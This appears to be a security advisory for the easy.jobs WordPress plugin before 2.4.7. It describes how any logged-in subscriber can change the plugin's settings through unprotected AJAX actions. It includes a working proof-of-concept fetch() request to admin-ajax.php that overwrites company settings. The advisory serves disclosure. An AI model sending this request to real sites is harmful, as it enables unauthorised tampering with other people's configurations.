easy.jobs < 2.4.7 - Subscriber+ Arbitrary Settings Update

Description The plugin does not properly secure some of its AJAX actions, allowing any logged-in users to modify its settings.

PoC

fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “multipart/form-data; boundary=----WebKitFormBoundaryvEIqF0bdJXlPN58D”, }, “body”: “------WebKitFormBoundaryvEIqF0bdJXlPN58D\r\nContent-Disposition: form-data; name="action"\r\n\r\neasyjobs_save_basic_info\r\n------WebKitFormBoundaryvEIqF0bdJXlPN58D\r\nContent-Disposition: form-data; name="form_data"\r\n\r\n{"company":{"name":"hehehehe","username":"xx","mobile_number":"999999999","company_type":{"id":60,"name":"Accounting & Finance"},"website":"https://sdsada.adsa","company_size":1,"description":"","benefits":"","show_explore_company":true,"show_job_filter":false,"show_location_filter":[],"jobs_per_page":"","show_location":false,"show_city":false,"show_state":false,"show_country":false},"companyAddress":{"postal_code":""},"lang":{"image":"/app-easy-jobs/img/languages/004-united-states-of-america.svg","name":"English","code":"en","extra":""}}\r\n------WebKitFormBoundaryvEIqF0bdJXlPN58D–\r\n”, “method”: “POST” });